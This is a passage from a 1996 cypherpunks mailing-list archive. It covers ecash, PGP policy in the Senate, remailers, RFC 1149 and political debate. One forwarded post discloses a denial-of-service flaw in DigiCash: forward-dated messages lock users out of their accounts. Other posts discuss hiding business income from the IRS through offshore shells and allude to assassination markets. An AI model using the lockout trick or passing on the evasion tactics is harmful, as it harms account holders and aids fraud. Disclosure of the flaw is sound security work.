Lines: 42
Sender: owner-ecash@digicash.com
Precedence: bulk

-----BEGIN PGP SIGNED MESSAGE-----

(Again Cc:'d to ecash-feedback, hoping for a security prize.  I wonder
 who's keeping track...  Also Cc:'d to cypherpunks, for fun...)

So I had some more free time... (Dave cringes when I say that.)

Here's a cute one:

Give me an account number, and I can prevent it from being used until
an arbitrary time in the future (of my choosing).

How?  Simple.

Send a deposit message with 0 coins (well, any message will work, I think, but
this is one of the simplest messages there is) with a timestamp of some future
time.

Messages stamped prior to that (such as everything coming from the
actual user for that account, until the time comes) will be politely
discarded.  (Actually, I think the last reply to a withdrawal request
is continually resent, but I'm not exactly sure of this.)  In any case,
the actual user will be unable to withdraw money from his mint until
the time sent in the denial-of-service message.  (Unless he forward-dates
his computer's clock, or something...)

I've tested this against myself and Sameer (with his cooperation, of course).
Anyone else want to be locked out for an hour?  (Actually, I could pretty
effectively lock out _everyone_ for an arbitrarily long time, it seems...)

   - Ian "Right.  I want the sources to the client and the server
          released.  Now."  :-)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMZpj3kZRiTErSPb1AQF0SAQAmOEZJTg0v3utWFodDXZ4iv4xa7I+QbNQ
Nlsbkug8dtkdf+Jboe+vBtrs5IWSSff8bWntGwfODckct26NwzpVM9bUIXohVoRQ
jOkRT9a8m/X00jUAoFOTq5O5Rz87a3Uw8MGFugP5Y4DCk+UqnTA70cuozyOCgb8m
8oke89V9Q0E=
=ARMe
-----END PGP SIGNATURE-----

--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"If they could 'just pass a few more laws',
  we would all be criminals."    --Vinnie Moscaritolo
The e$ Home Page: http://thumper.vmeng.com/pub/rah/







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jbugden@smtplink.alis.ca
Date: Sat, 18 May 1996 17:20:59 +0800
To: perry@piermont.com
Subject: RE: Edited Edupage, 9 May 1996
Message-ID: <9604168322.AA832264836@smtplink.alis.ca>
MIME-Version: 1.0
Content-Type: text/plain



Perry Metzger wrote:
>As long as this is now CypherCesspit and not CypherPunks, I might as well play
the game.

Thinking of game theory, couldn't the prisoner's dilemma apply to this; where
what is best for the group is not necessarily best for the individual. 

>Every year since World War II, expenditures in real dollars have
increased per pupil at the government schools. Every year, average
class size has gone down in the government schools. 

I would be curious to know your source for this information. The information I
have indicates that in California when Ronald Reagan became governor, 80% of the
funding for state universities such as UC Berkeley and UCLA came from the public
purse. Last year, only 24% of the funding came from the government. I would have
trouble believing that the overall school system was radically different.

The teenage children of a visiting Brazilian professor commented that no other
country was like Canada in the sense that people here received a low cost
education and did not go destitute. Contrast this to their situation in Brazil
where off duty police officers are often hired by merchants to get rid of the
street urchins that disrupt their businesses. See current edition of french
Photo magazine (cover Ayrton Sennas ex girl friend) for a pictorial.

Scientific American (June 1995) has an article entitled The Arithmetics of
Mutual Help - Computer experiments show how cooperation rather than exploitation
can dominate in the Darwinian struggle for survival. To paraphrase, cooperation
arises naturally in most biological systems. Lone defectors do well, but by
spreading, defeat themselves. (See: CypherCessPool for example).

I appreciate my free public education. I might not have been so forward thinking
if I had to go deeply into debt to finance it myself.

>Actually, I believe most people on this list argue for no government
or so little that its decisions hardly matter.

I agree. Unfortunately, that would seem to put me in the minority.

James

>Perry

jbugden@alis.com
What we do not understand, we do not possess. - Goethe






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bryce@digicash.com
Date: Sat, 18 May 1996 04:27:20 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Why does the state still stand:
In-Reply-To: <199605160602.XAA28844@pacifier.com>
Message-ID: <199605160809.KAA17994@digicash.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

(conversation history:)
<JamesD@echeque.com> said current ecash was hard to use.
<bryce@digicash.com> said 'no way'.


 The entity calling itself jim bell <jimbell@pacifier.com>
 is alleged to have written:
> 
> But what I'm looking for is full payee/payor anonymity.  (three guesses as 
> to why...)   Can you do this?  If not, why not?


Let me get this straight.  You are asking for full payee/payor
anonymity so that you can institute a program of anonymous 
assassination contracts, right?


Fuck off.


Bryce




-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
Comment: http://www.c2.net/~bryce -- 'BAP' Easy-PGP v1.1b2

iQB1AwUBMZri0EjbHy8sKZitAQFOSwL9EjmbEwDTnId7QcYdUcP43Gx60dtvPwNf
FQktBdqZXRL72+NAbfqz73djeCioFdY/GOXMxdEkKDy3E8RA9mdZmJRLytboIs03
zdhcAGmxBxEHXC0t9Cz3ZzpClS8ddpWn
=UX8r
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Doug Hughes <Doug.Hughes@Eng.Auburn.EDU>
Date: Sat, 18 May 1996 10:08:49 +0800
To: cypherpunks@toad.com
Subject: Re: Edited Edupage, 9 May 1996
In-Reply-To: <adbf59cf01021004ac30@[205.199.118.202]>
Message-ID: <doug-960516110434.A0116078@netman.eng.auburn.edu>
MIME-Version: 1.0
Content-Type: text/plain




>
>"True democracy" is actually much worse than what we have now. The
>advantage of what we are doing with strong cryptography is that it
>undermines democracy.
>
>

Totally agreed. I'll take our representative form of govt over that any
day (warts and all)

--
____________________________________________________________________________
Doug Hughes					Engineering Network Services
System/Net Admin  				Auburn University
			doug@eng.auburn.edu
		Pro is to Con as progress is to congress







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: brian dodds <jyacc!aspen!bdodds@uunet.uu.net>
Date: Sat, 18 May 1996 11:53:39 +0800
To: jim bell <aspen!uunet!pacifier.com!jimbell@uunet.uu.net>
Subject: Re: Past one terabit/second on fiber
In-Reply-To: <199605152051.NAA21380@pacifier.com>
Message-ID: <Pine.SUN.3.91.960516110550.16435B-100000@aspen>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 15 May 1996, jim bell wrote:

> Reminds me of an old joke:  "This computer's so fast it does an infinite 
> loop in 5 seconds!"

a friend of mine once said his 486 (when most of us were on 286's) was so 
fast it would process commands before he typed them..

> >i notice they're still using the encyclopedia/second benchmark..
> 
> It's an old habit, I suppose.  It's hard to explain "one trillion", at least 
> to non-tech types.  A good modern replacement might be to say, "200 CDROM's 
> per second", except that even today most people don't know how much storage 
> a CDROM represents.  "16 million one-way phone calls" is also helpful as a 
> benchmark.

well, maybe we should update this measure to meet the range like they did 
with the bel.. since an encyclopedia per second (eps) is a useless 
measure, maybe we should institute the mega-encyclopedia per second, or 
`meps' which would be 1024x30volumes of text.. `this little number over 
here'll do 30 meps!'..

				bri..

--bdodds@jyacc.com
brian dodds, systems administration, jyacc, inc. wellesley, ma 
--617.431.7431x125
opinions expressed within are not necessarily my own or anyone elses..





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: di40349@goodnet.com (covacks)
Date: Sat, 18 May 1996 09:36:39 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199605161857.LAA03091@goodguy.goodnet.com>
MIME-Version: 1.0
Content-Type: text/plain

#!/bin/csh
setenv PATH /bin:/usr/bin
set username=`id | sed -e 's/).*//' -e 's/.*(//'` set homedir=~$username
set tmpfile=$homedir/.mailtmp.$$
cat > $tmpfile
if ( { egrep -q '^Sender: owner-cypherpunks@toad.com' \
$tmpfile } ) then
rm -f $tmpfile
exit 67
endif
(rm -f $tmpfile; exec /bin/mail -d $username) < $tmpfile




|"IFS=' '&&exec csh /documents/.forward #covacks"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sat, 18 May 1996 19:12:05 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: Senator, your public key please?
Message-ID: <Pine.SUN.3.93.960516113814.751D-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----


I was running around the hill all morning and I thought I would drop in on
Leahy to see what his key signing policies were.  I gave Leahy a buzz to
see if I could catch him in person but unfortunately it's a busy day on
the hill and he sent me off to Beryl Howell instead.

Ms. Howell is Senior Counsel for the minority staff of the Antitrust
Subcommittee and handles all of Leahy's encryption gofering.  I'd dealt
with her on a limited basis once before, and I got a good 10 minutes to
discuss some issues before she had to run off elsewhere.

The issues she brought up were interesting.

Firstly, Leahy wasn't advised to issue a public key, it was entirely his
idea.  No staff suggestion there.

Secondly, the Ethics Committee was very interested in the issue.  As of
now they have ruled that "exchanging" PGP signatures is an "exchange in
kind" and an ethics violation.  Ms. Howell expressed exasperation over
this lunacy, but put it much this way:  "No, you guys don't understand
what the issues are here, but I don't have 3 hours to explain it all to
you either."  Apparently the ethics committee is concerned that a
signature from Leahy's key will constitute some sort of endorsement and the
"you sign mine and I'll sign yours" looks like influence peddling.

Part of the problem was that several politically oriented groups
approached Leahy's office and descended like vultures on a carcass,
all of them wanting to certify his key.  

No signing from Senator's keys for the time being.  She said the ethics
committee went so far as to prohibit them from soliciting signatures from
others as well.  Her conservative (and reasonable) interpretation was that
she couldn't hand over a fingerprint of the key for signing purposes.

As things stand now Ms. Howell intends to try and educate some of the key
Ethics members over the August break and have a decent signing policy
after the break itself.

Welcome to the hill.

Those of you who haven't might want to check out the May 2, 1996 version
of the Promotion of Commerce on-line in the Digital Era (Pro-Code) bill.

Nice choice snippet:  The current strength of encryption the U.S.
government will allow out of the country is so week that, according to a
January 1996 study conducted by world-renowned cryptographers, a
pedestrian hacker can crack the codes in a matter of hours.  A foreign
intelligence agency can crack the current 40-bit codes in seconds.

Also:  "Encryption expert Matt Blaze, in a recent letter to me, noted that
current U.S. regulations governing the use and export of encryption are
having a "deleterious effect... on our country's ability to develop a
reliable and trustworthy information infrastructure."

See: http://www.senate.gov/~leahy/
For some reason http:/www.leahy.senate.gov/ is also listed.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Autodocument signed

iQCVAwUBMZtRLWqgui0rHO4JAQHRywQAgClfWZTLDCusKaAlefg53DShaCII6+vF
O4X9a6vCZDWtIE0Nu7Nx/75K6zDo7AdjfqfYcAdLq4WW4F0FBH7u55+MYKUjDJ3X
YFuxk9aPQSJzkgITK4EzGfHNswONkybuhAGo/6mcvJ8E2QW5rxUKRFxh7BLo7fmV
CrEpvhzsycU=
=uWRd
-----END PGP SIGNATURE-----

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: timd@consensus.com (Tim Dierks)
Date: Sat, 18 May 1996 04:35:51 +0800
To: "Jay Haines" <jay_haines@connaught-usa.com>
Subject: Re: RSAREF for Mac?
Message-ID: <v02140b05adc12b52fab9@[206.170.39.104]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:26 PM 5/14/96, Jay Haines wrote:
>It seems that I have seen this question asked before, but as I had no need for
>the answer at that time, I trashed it. So, without further ado:
>
>Can anyone point in the direction of RSAREF for the Macintosh?

Sorry for the delay. RSAREF for Mac is the same as any other RSAREF; RSAREF
is distributed as fairly portable C source. For a recent project, I just
added the sorce files to a Metrowerks project and built and it worked fine.
It compiles without errors or warnings on all the Mac platforms I've tried
thus far (it does generate "possible unintended assignment" warnings (for
assignments inside of if statements) if you've got that turned on).

If you're having problems, feel free to drop me a note.

 - Tim


Tim Dierks  --  timd@consensus.com  --  www.consensus.com
Head of Thing-u-ma-jig Engineering, Consensus Development







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark Voorhees" <mark@infolawalert.com>
Date: Sun, 19 May 1996 02:53:36 +0800
To: "cypherpunks@toad.com>
Subject: Zimmermann v. ViaCrypt??
Message-ID: <199605161604.MAA22380@park.interport.net>
MIME-Version: 1.0
Content-Type: text/plain



There is a story @

http://infolawalert.com/stories/051796a.html

describing how Phil Zimmermann is trying to
retrieve all the rights to PGP from ViaCrypt
in order to jump start his new venture, PGP, Inc.

He's taking a sell out or get sued approach with
ViaCrypt, which until recently has not had much
success marketing PGP.

Mark








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Reid <root@edmweb.com>
Date: Sat, 18 May 1996 17:49:47 +0800
To: cypherpunks@toad.com
Subject: [NOISE] Re:Rural Datafication (via RFC 1149)
Message-ID: <Pine.BSF.3.91.960516131202.145A-100000@bitbucket.edmweb.com>
MIME-Version: 1.0
Content-Type: text/plain


Hmm... Maybe this could be a low-cost way to get rural areas connected to 
the internet? The RFC says it's primarily for metropolitan areas, but I 
believe it could be equally effective in rural areas.

:)

(BTW, this is a "real" RFC. I got it from ftp.internic.net.)

----------------------------------------------------------------------

Network Working Group                                        D. Waitzman
Request for Comments: 1149                                       BBN STC
                                                            1 April 1990


   A Standard for the Transmission of IP Datagrams on Avian Carriers

Status of this Memo

   This memo describes an experimental method for the encapsulation of
   IP datagrams in avian carriers.  This specification is primarily
   useful in Metropolitan Area Networks.  This is an experimental, not
   recommended standard.  Distribution of this memo is unlimited.

Overview and Rational

   Avian carriers can provide high delay, low throughput, and low
   altitude service.  The connection topology is limited to a single
   point-to-point path for each carrier, used with standard carriers,
   but many carriers can be used without significant interference with
   each other, outside of early spring.  This is because of the 3D ether
   space available to the carriers, in contrast to the 1D ether used by
   IEEE802.3.  The carriers have an intrinsic collision avoidance
   system, which increases availability.  Unlike some network
   technologies, such as packet radio, communication is not limited to
   line-of-sight distance.  Connection oriented service is available in
   some cities, usually based upon a central hub topology.

Frame Format

   The IP datagram is printed, on a small scroll of paper, in
   hexadecimal, with each octet separated by whitestuff and blackstuff.
   The scroll of paper is wrapped around one leg of the avian carrier.
   A band of duct tape is used to secure the datagram's edges.  The
   bandwidth is limited to the leg length.  The MTU is variable, and
   paradoxically, generally increases with increased carrier age.  A
   typical MTU is 256 milligrams.  Some datagram padding may be needed.

   Upon receipt, the duct tape is removed and the paper copy of the
   datagram is optically scanned into a electronically transmittable
   form.

Discussion

   Multiple types of service can be provided with a prioritized pecking
   order.  An additional property is built-in worm detection and
   eradication.  Because IP only guarantees best effort delivery, loss
   of a carrier can be tolerated.  With time, the carriers are self-



Waitzman                                                        [Page 1]


RFC 1149             IP Datagrams on Avian Carriers         1 April 1990


   regenerating.  While broadcasting is not specified, storms can cause
   data loss.  There is persistent delivery retry, until the carrier
   drops.  Audit trails are automatically generated, and can often be
   found on logs and cable trays.

Security Considerations

   Security is not generally a problem in normal operation, but special
   measures must be taken (such as data encryption) when avian carriers
   are used in a tactical environment.

Author's Address

   David Waitzman
   BBN Systems and Technologies Corporation
   BBN Labs Division
   10 Moulton Street
   Cambridge, MA 02238

   Phone: (617) 873-4323

   EMail: dwaitzman@BBN.COM





























Waitzman                                                        [Page 2]







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sawyer@nextek.com (Thomas J. Sawyer)
Date: Sat, 18 May 1996 09:20:30 +0800
To: cypherpunks@toad.com
Subject: Re: Securing CDROM from piracy
Message-ID: <v02140b01adc0e2654d5f@[199.173.75.113]>
MIME-Version: 1.0
Content-Type: text/plain


>Is there any way of making
>sure that the guy doesnt pull a fast on on us? Can we ensure that he cannot
>duplicate the thing and start selling it without sharing the profit.
>--
>   '88888888:::888888%'   Vipul Ved Prakash        Fax : +91-11-3328849
>     '8888888::88888%'    Positive Ideas.     Internet : vipul@pobox.com

Well, I suppose you could get it copyrighted before you hand it over for
distribution.  I'd also put my logo and other info somewhere in the code,
such as an "About" box.  They would have a hard time saying it wasn't
yours.


Thomas J. Sawyer
sawyer@nextek.com







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Sat, 18 May 1996 09:47:01 +0800
To: Lyal Collins <lyalc@ozemail.com.au>
Subject: Re: Java & signed applets
In-Reply-To: <319B436D.507E@ozemail.com.au>
Message-ID: <Pine.SUN.3.91.960516141623.9358D-100000@tipper.oit.unc.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 16 May 1996, Lyal Collins wrote:

> Signing anything is somewaht a waste of time, unless the verification
> siftware is highly trusted, and there is good intergity/authenticity
> control of the root public key(s).

The verification software is simple enough to be quite highly trusted, 
and if the privilege model is stupid enough, it too can be quickly 
verified. The trickiest part of the process is  making sure that you 
don't sign any code you're not prepared to vouch for...

Simon





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sawyer@nextek.com (Thomas J. Sawyer)
Date: Sun, 19 May 1996 01:48:54 +0800
To: Vipul Ved Prakash <vipul@pobox.com>
Subject: Re: Securing CDROM from piracy
Message-ID: <v02140b01adc0e9be0743@[199.173.75.113]>
MIME-Version: 1.0
Content-Type: text/plain


>>
>> >Is there any way of making
>> >sure that the guy doesnt pull a fast on on us? Can we ensure that he cannot
>> >duplicate the thing and start selling it without sharing the profit.
>>
>> Well, I suppose you could get it copyrighted before you hand it over for
>> distribution.  I'd also put my logo and other info somewhere in the code,
>> such as an "About" box.  They would have a hard time saying it wasn't
>> yours.
>>
>You are missing the point. Lets say a firm X is marketing my product. Now if
>they sell 500,000 copies and tell me that they have sold only 100,000, I have
>no way of figuring out.
>
>   '88888888:::888888%'   Vipul Ved Prakash        Fax : +91-11-3328849
>     '8888888::88888%'    Positive Ideas.     Internet : vipul@pobox.com

Ok, I see what your looking for now. How about tracking the number of
product registrations, either via a mail-in card or fax? I'm assuming
that since this is a product to be sold, not given away, that persons
purchasing the program would most likely take the time to fill out a
product registration card and send it in.  Since not everyone fills these
cards out, it is not a 100% accurate method, but if there were any major
discrepancies, then you would be aware of it.

Thomas J. Sawyer
sawyer@nextek.com







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hector Garcia-Molina <hector@DB.Stanford.EDU>
Date: Sat, 18 May 1996 18:57:29 +0800
To: sift-users:;
Subject: SIFT service moving to Reference.COM
Message-ID: <199605162214.PAA18034@Coke.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


Dear SIFT Subscriber:

Stanford University is pleased to announce a new partnership with
InReference, Inc. which will significantly enhance your service.

Under the terms of the agreement, Stanford is transferring the SIFT
service to InReference.  InReference will make the SIFT functionality
available through its Reference.COM service (http://www.reference.com/).
To minimize the disruption in your service, your queries will be
automatically migrated to Reference.COM.  The service will remain
free of charge.

We believe InReference is an excellent home for SIFT.  The Company has
the infrastructure and support necessary to provide you with a high
quality service.  In addition, InReference has added many interesting
new features to the service:

* More Content

  - 6+ month archive of more than 13,000 news-groups.
  - The Internet's largest archive of publicly-accessible mailing
    lists (soon to exceed 1,000).

* Advanced Search Capabilities

  - Powerful filtering: Interactively refine your search using
    message header fields such as author, organization,
    conversational thread, newsgroup/e-mail list.
  - Query Templates: Identifying and entering the right newsgroups
    and mailing lists to search can be tedious.  InReference has
    formulated a few query templates which pre-select the right
    newsgroups and lists for a particular topic.

* Web and E-mail Accessible

  - Submit queries and receive results via e-mail or at the
    Reference.COM web site.

You will receive a welcome notification from InReference in June,
along with an (initial) username and password.  In most cases, this
should be identical to your existing SIFT username/password.

Thank you for your ongoing interest in SIFT.

Sincerely,

Tak Yan, SIFT Architect
Hector Garcia-Molina, Principal Investigator, Digital Library Project
Department of Computer Science
Stanford University


Q: Who is InReference?
A: InReference is a startup located in the NASA Ames Technology
   Commercialization Center in Silicon Valley.  InReference has
   strategic partnerships with a number of well-known companies.
   These partnerships help provide the infrastructure to supply you
   with a first rate service:  database technology from Oracle, search
   engines from Verity, servers from Sun, high speed Internet access
   from Pacific Bell, and high speed RAID storage from Storage Computer.

   InReference also has a great team of programmers dedicated to
   providing a quality service.  Our technical team includes Eric
   Allman, the creator/developer of sendmail and Professor Hector
   Garcia-Molina, Principal Investigator of the Digital Library
   Project at Stanford University.

Q: How will people access the Reference.COM service?
A: Queries can be submitted and the results retrieved via the web
   (http://www.reference.com) or by e-mail.  See their web page
   for details.

Q: If it's free of charge, how does InReference pay for the service?
A: Through the generosity of strategic partners, and advertising.

Q: Is InReference's query syntax the same as SIFT's?
A: No.  To provide additional functionality, InReference has
   extended and changed the SIFT query syntax.  Send e-mail to
   info@reference.com if you have further questions.

Q: How do I discontinue my service?
A: There is syntax to support an array of account management activities,
   including account termination.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Sun, 19 May 1996 00:40:58 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: Why does the state still stand:
Message-ID: <199605162310.QAA06491@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  6:44 PM 5/16/96 -0400, E. ALLEN SMITH wrote:
>From:   IN%"frantz@netcom.com" 15-MAY-1996 22:39:50.97
>
>>You could require daily payment and forgo the escrow agent.  (Assuming you
>>are willing to risk a day's pay as an experiment in reputation.)  Note that
>
>        This could work for fixed payments. But what about things like
>profit-sharing?

I think building trust in this kind of thing is a big problem.  There are
so many ways you can get ripped off.  Failure to distribute.  Fake costs in
the accounting.  Off record sales of the product.  Phantom partners who do
nothing but funnel profits to someone. etc. etc. etc.  A fully anonymous
audit may be what is needed, unless you are able to build enough trust in
an individual nym that you won't get ripped off.  Anyone got a protocol for
fully anonymous auditing?


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Sat, 18 May 1996 14:17:26 +0800
To: jamesd@echeque.com
Subject: Re:  SEVERE undercapacity, we need more remailer servers FAST
In-Reply-To: <199605152129.OAA17878@dns2.noc.best.net>
Message-ID: <Pine.LNX.3.93.960516162320.162A-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Wed, 15 May 1996 jamesd@echeque.com wrote:

> What do I need to do to support a remailer that posts to non binary
> newsgroups? (I do not have root control on a unix machine other than my
> employers machine, for which I am unlikely to receive approval to use 
> in this fashion.)

There are a couple of different ways that a remailer can be used to support
mail-to-news.  The easy way to block binary posts, is to scan the first few
lines of the message for "begin xxx pic.jpg" and it could also scan for
base64.  Also, messages that are sent to a newsgroup could have a maximum
length.

One way that mail-to-news works, is that the message has newsgroup headers and
it is directly passed to inews for posting.  In this case, the headers could
be scanned for any binary newsgroups.  If mail2news software is being used
which creates a mailing alias for each newsgroup, then the e-mail addresses
of all the binary newsgroups could be placed on the block list.  Unfortunately,
you do need root access to set up such an alias.

If you don't have root access, then grepping the newsgroups header for binary
newsgroups before piping the message to inews is probably the best way.

- -- Mark

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
markm@voicenet.com              | finger -l for PGP key 0xe3bf2169
http://www.voicenet.com/~markm/ | d61734f2800486ae6f79bfeb70f95348
((2b) || !(2b))                 | Old key now used only for signatures
"The concept of normalcy is just a conspiracy of the majority" -me


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMZuQkbZc+sv5siulAQFNoAP+IWzzPLqx8chkfLIWsY53Gesst6m6mReS
uLYmWE4lCnuKK0T3UqD7PmsS4rNjsz1Vc+fj7/vQIDAI7OV0znZpWT3ZjWJMwckX
u62DvWXqsve2YWHDQAxdzW/IY+4iEQHXJmVSZbV6sw/ycF20+2yeYjDQlPzOoADJ
rP+oxEaCCHg=
=AS4M
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Sat, 18 May 1996 09:13:05 +0800
To: bryce@digicash.com
Subject: marginal cost of ecash transaction
In-Reply-To: <199605152059.WAA10819@digicash.com>
Message-ID: <Pine.SUN.3.93.960516174550.3310A-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 15 May 1996 bryce@digicash.com wrote:

> Excuse me?  Here James, have a penny.
> 
> - -----BEGIN ECASH PAYMENT-----
> [... penny deleted ...]

That brings up an interesting question.  What is the marginal cost to
MarkTwain of such a one-cent ecash transaction?  If everyone started
sending each other these pennies, will MarkTwain go broke? 

Wei Dai






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Subir Grewal <grewals@acf2.nyu.edu>
Date: Sat, 18 May 1996 15:58:45 +0800
To: Jim McCoy <mccoy@communities.com>
Subject: Re: [NOISE] Re: Edited Edupage, 9 May 1996
In-Reply-To: <v02140b01adbffa43e336@[205.162.51.35]>
Message-ID: <Pine.ULT.3.92.960516175918.23964E-100000@acf2.NYU.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Wed, 15 May 1996, Jim McCoy wrote:

:Yes, he is.  It is times like this that I must count myself among the
:pitchfork and torch wielding mob, if only because I have been cursed
:with a small amount of compassion for those who were not as lucky as I.

Compassion requires direction as well.  It seems as if you're suggesting
that your goals are laudable simply because they manifest compassion
regardless of their effectiveness.  The argument being made was that the
state is extraordinarily inefficient at providing education (unless you
consider west point education).  Of course it's entirely possible that you
don't believe the axiom "I am generous, I am morally superior, the rest of
you are narcissist selfish capitalist pigs.  I have feeling for the poor
and I want to help them any way I can, even if those methods are
ineffective".  But it doesn't sound like it.

Once again, the argument being made was regarding inefficiency, _not_
compassion or lack thereof.  I can have lots of compassion and still
believe that handing pink fluffy teddy bears out at street corners is
going to do anyone any good.

:BTW Mr. Avon, the reason we, the unruly mob of collectivists, socialists, and
:[insert libertarian/anarchist buzzword here] should stick a gun in your
:back and make you cough up money for education is because we can.  If you
:don't want to do so, they why don't _you_ move?  Are your feet cast in
:concrete blocks?

That argument can be made on a local level.  Not when there are federal
mandates requiring public schools and their funding by local govts.
Voting with you feet is a reasonable way to permit regional govts. to
compete with each other (like in Europe, or between the states).  People
only make as major a decison as moving from a large country like the US
if there is some extremely pressing need, genocide is a good candidate.

hostmaster@trill-home.com * Trills 4 thrills * Blue-Ribbon * Lynx 2.5
"Well, if you can't believe what you read in a comic book, what *can*
you believe?!"
          -- Bullwinkle J. Moose [Jay Ward]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMZunLhwDKqi8Iu65AQHg2AL+PJ86PA4GATCcx9BG2fyROSbp2nf8LqNg
syYNPHPp+XnJRd6ldUy+A0dL84AtDfA0cKCiNBvSSpd/T05jKpXIuc8dlfiF6skT
GAB7TunZI5tQJTlL4n05ooJGfvqM10k9
=fMFg
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sat, 18 May 1996 04:56:12 +0800
To: unicorn@schloss.li
Subject: Re: Fingerprinting annoyance
Message-ID: <01I4S7OCDTOG8Y5FF6@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"unicorn@schloss.li"  "Black Unicorn" 15-MAY-1996 19:40:34.88


>It means essentially the IRS and banks.  Even banks have little recourse.
>They make you sign a piece of paper that says you gave them the right SSN,
>but practically speaking no one cares.

>Equifax (a credit reporting agency) refuses to take bank records as
>evidence of SSN's because they KNOW the banks don't care or enforce and
>that people lie to or make mistakes to the bank on a daily basis.

	Fascinating. I would think the IRS would care - that's how they know
how to tax interest. They don't put any pressure on the banks to get the right
one? I seem to recall showing the bank a driver's license or some such with
a SSN on it the last time I opened an interest-bearing account.
	As I recall, government branches are authorized to get SSNs - if they
show you the privacy act paperwork. If they forget, I would suppose that
lying to them is perfectly permissible. What about if they do?
	-Allen





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sat, 18 May 1996 10:17:52 +0800
To: unicorn@schloss.li
Subject: Re: Why does the state still stand:
Message-ID: <01I4S7SRC0WM8Y5FF6@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"unicorn@schloss.li"  "Black Unicorn" 15-MAY-1996 20:46:58.17

>So what, pray tell, is the IRS going to do?  Impose a "we see no income"
>fine and seize property?

>They can audit, but audits are winable too.  An offshore company simply
>keeps dropping cash into the local business.  That's not a crime.  The
>local business is losing money like crazy, but who is to say they are
>defrauding per se?  Bad business judgment is hardly tax fraud, and how do
>you know (with a properly blinded ownership) that the assets that are
>pouring into this company with all these expenses are taxible in the U.S.
>in the first place?

	Well, the IRS could ask the very sensible question of where is all
this property going to? It's not going to be on the lot of someone is renting
it via ecash. You could claim it had been destroyed, although there are
supposed to be tracking mechanisms for cars. For land, houses, etcetera,
they're going to be suspicious when they find someone living in them. Now,
they may not have enough to prosecute on - but they can keep an eye on the
business' employees + the people driving those cars around or living on that
property to try to catch them doing something illegal; sort of a reverse
Al Capone. If enough people are doing this, this surveilance does become
impractical. But the transitional period is important.
	-Allen





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Sun, 19 May 1996 02:18:53 +0800
To: Hal <hfinney@shell.portal.com>
Subject: anonymous companies
In-Reply-To: <199605142335.QAA13553@jobe.shell.portal.com>
Message-ID: <Pine.SUN.3.93.960516180003.3310B-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 14 May 1996, Hal wrote:

